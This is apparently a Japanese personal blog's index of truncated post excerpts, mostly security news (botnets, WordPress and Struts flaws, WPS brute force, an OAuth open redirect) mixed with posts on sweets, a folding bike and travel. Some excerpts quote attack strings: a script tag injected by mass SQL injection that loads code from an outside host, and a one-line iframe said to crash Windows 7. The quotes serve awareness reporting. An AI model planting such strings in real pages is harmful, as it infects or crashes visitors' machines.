犯罪者がマルウェアに感染させ、ボットにして操れるようにしたホストを使って、どうお金にするかという話です。これまではスパムやDDoS攻撃の代行サービスはよく耳にしていましたが、SNSのマーケティングのためにも使われているようです。以下は、そのサービ…
ふわっふわのクリームパン的な素朴な味わい。カスタードがとても美味しいです。カップの底に入ったざらめがいいアクセントです。 味は5種類、プレーン、いちご、キャラメルバナナ、チョコレート、ゆず。 中身はこんな感じ。柔らかすぎて上手く切るのが難しい…
ORi M10というフォールディングバイク(折り畳み自転車)を購入しました。 これまで普段使ってた十数年選手のママチャリの代わりとしての登板です。クロスバイクはBianchiのCamaleonte4を乗っているので、フォールディングバイクで有名なBD-1がベースの Bian…
2000人の調査結果によると、50%は1日に4つの異なるパスワードを思い出す必要があり、21.6%は8つ以上のパスワードを思い出す必要があるそうです。 企業のセキュリティポリシーなどによって、53.5%はそれらのパスワードを定期的に変更することを要求され、…
古くからあり、未だに絶えることのないパスワード攻撃ですが、それでもユーザーが強いパスワードを作って、それを使ってくれることは期待できません。 Googleは長期的にはOpenIDを広めたいようですが、それが叶うのはまだ先の話だということで、Chromeブラウ…
ベー・ドゥ・リヨン(ベルナシオン) 毎度お馴染みフランスのリヨンにしか店がない、ベルナシオンのタブレット。私が一番好きなチョコレートです。このためだけにサロン・デュ・ショコラに行ってるといっても過言じゃないぐらい。 フランスで買うと700円ぐら…
2月28日(火)にSCSK主催、IBM共催の『緊急開催!サイバー攻撃の動向と対策セミナー〜セキュリティスペシャリストから学ぶ最新セキュリティ事情〜』にて基調講演を『最新のサイバー攻撃動向』というテーマで務めさせて頂きます。 内容は、標的型攻撃、Webへの…
Facebookはよく詐欺やスパムのターゲットになっていて、そのために偽アカウントが作られることもあります。そんな攻撃者などが作成した偽アカウントの特徴を、Barracuda Labsが2884のアクティブユーザーから分析しています。 偽アカウントの60%はバイセクシ…
Wordpress3.2.1の脆弱性を狙ったマルウェアが拡がっているそうで、ここ数日で数百のサイトが攻撃で感染しているとのこと。 攻撃が成功した場合、UploadsフォルダにHTMLページがアップロードされ、マルウェアの感染を自動化するPhoenix Exploit Kitのページに…
Symantec社から各種製品の2006年のソースコードが奪われた事件に起因した、セキュリティの警告が出ています。 その中でも「pcAnywhere」というリモートアクセスのソフトウェアは、中間者攻撃を受けたり、盗聴されるなどの可能性があり、危険なため使用を停止…
Stuxnet以来、SCADAシステムのセキュリティが注目されていますが、Reid Wightman氏を始めとしたベースキャンプチームが6社のSCADAシステムのセキュリティ調査を行いました。 調査対象となたシステムは5社7製品で下記のとおり。 Control Microsystems SCADAPa…
NSA(国家安全保障局)は、Android Security Enhanced (SE)の最初のバージョンをリリースしました。 このシステムはAndroidのセキュリティホールの影響を最小限に抑えるように設計されたシステムで、Androidの中でSELinuxが使えるそうです。SELinuxがAndroid…
任意のURLにリダイレクトできるオープンリダイレクタの状態になっていたようです。一見、GoogleなどのURLに見えますが、攻撃者が指定したサイトに自動的に遷移してしまいます。 Google https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.s…
GoogleはChromeブラウザの最新ベータ版に、ユーザーがWebサイトから悪意のあるソフトウェアをダウンロードしようとするときに警告する機能を搭載しました。 ダウンロードした実行可能ファイル(.exeや.msiなど)に含まれるマルウェアを分析するための拡張機…
毎回台湾に行くたびにパイナップルケーキの食べ比べをしている気もしますが、今回もまた食べ比べています。 前回現地の方からの貰い物だった『佳徳糕餅(ジャーダーガオピン)』のお店にも行ってきました。前回の食べ比べはこちら。 2011.7.31: 台湾の人気パ…
Apache Struts2 (脆弱性を攻撃するPoCが公開されています。リモートからのコマンド実行など重大なものもあります。 Apache Struts2 Ver.2.3.1.1で修正されているので、要アップデートです。 Apache Struts2 <= 2.3.1 Multiple Vulnerabilities
自分用のメモ 事前の確認事項 国際電話が利用可能なこと(WORLD CALL?) 転送電話サービスを申し込んでいること 国際転送電話サービスを申し込んでいること 遠隔操作設定を可能にしておく(「159」にコール) 転送電話サービスなどを申し込んでいない場合は…
元日の読売1面記事になった割には、国内でもあまり騒がれていない防衛省の対サイバー兵器のニュース(防衛省が対サイバー兵器、攻撃を逆探知し無力化 : 社会 : YOMIURI ONLINE(読売新聞))ですが、海外の反応も地味なものです。 The Hacker News (THN)が「…
Wordpress最新版のVer.3.3にクロスサイト・スクリプティング(XSS)が発見されました。 今のところ0-dayのようで、PoCも公開されまくっています。運用されている方はご注意を。 An Old man lab0ratory: Wordpress 3.3 XSS vulnerability
ISC(Internet Storm Center)のレポートによると、lilupophilupop.comへのリンクを埋め込むSQLインジェクション攻撃の被害がおよそ100万サイトで確認されています。 攻撃されると以下の文字列を挿入されているのが確認できるとのこと。 "> "></title><script src="http://lilupophilupop.com/sl.php"></script> - Google 検索 …
毎年1月1日は著作権の期限が切れる瞬間を祝う Public Domain Dayです。 書籍やフィルム、写真、楽曲に至るまで誰もが自由に使えるようになる日です。今年著作権が切れるのは、海外では、Louis Brandeis, James Joyce, Virginia Woolfなど名前が挙がっていま…
今朝方お神籤を引いてきたところ、1番大吉をひきました。今年も良い年になりますように。
私も流れに乗っかって、ここのアクセス数ベスト5記事をまとめてみました。 パスワード認証を回避してWindowsにログインする方法 - 2011-07-10 法人の本店移転登記&代表取締役住所変更メモ - 2008-03-31 意外と知らない?NICを冗長化するボンディング(bondi…
情報化白書委員会をさせていただいた「情報化白書2012」の発刊を記念したシンポジウムにて、パネル「生活情報化とセキュリティ」で登壇させて頂きます。 2012年2月15日(水) 13:30〜17:00(受付開始13:00) TKP大阪梅田ビジネスセンター カンファレンス…
Wi-FiのWPA/WPA2で簡単・安全に設定できる仕組みとして使われているWPS(Wi-Fi Protected Setup)のPIN(暗証番号)がブルートフォースアタックで簡単に解読できてしまう脆弱性があるとのこと。(US-CERT Vulnerability Note VU#723755 - WiFi Protected Set…
64ビット版Windows7のSafari経由で罠を仕込んだIFRAMEタグを表示するだけで、ブルースクリーン(BSoD)状態になるようです。これはSafariの脆弱性ではなく、Windowsカーネルモードドライバー win32k.sysの問題とのこと。 <iframe height='18082563'></iframe> window.twttr = (function(d, s, id…
この1年は事件がありすぎて記憶の彼方かもしれませんが、アメリカの歴史の中でも最大の機密情報不正開示だと言われている、Wikileaksへの外交公電の漏えい事件が去年の11月末ごろにありました。その犯人と言われている米国陸軍のブラッドリー・マニング氏は…
盗まれたiPhone4Sをリモートワイプ機能でAppleIDのパスワード変更などをしたそうですが、iMessegeを送ると新しい端末と盗まれた古い端末の両方に送られて、盗品を買ってしまった人宛にもメッセージが届いたとのこと。 UDIDという端末の識別子がサーバー側で…
HTML5のセキュリティレポート(英語)が公開されています。今後注目の分野ですね。 レポートには以下のことについて書かれています。 Cross-Origin Resource Sharing (CORS) Web Storage オフラインWebアプリケーション Web Messaging カスタムプロトコル(…
サツマイモだけでこれだけのバリエーションを展開できるのはすごいと思う。基本は芋だけど、それぞれ口当たりや味わいも違ってます。シンプルで美味しい。 芋なのでお腹はいっぱいになりますね。大満足。 パン、ミニクロワッサン、パネトーネ、スイートポテ…
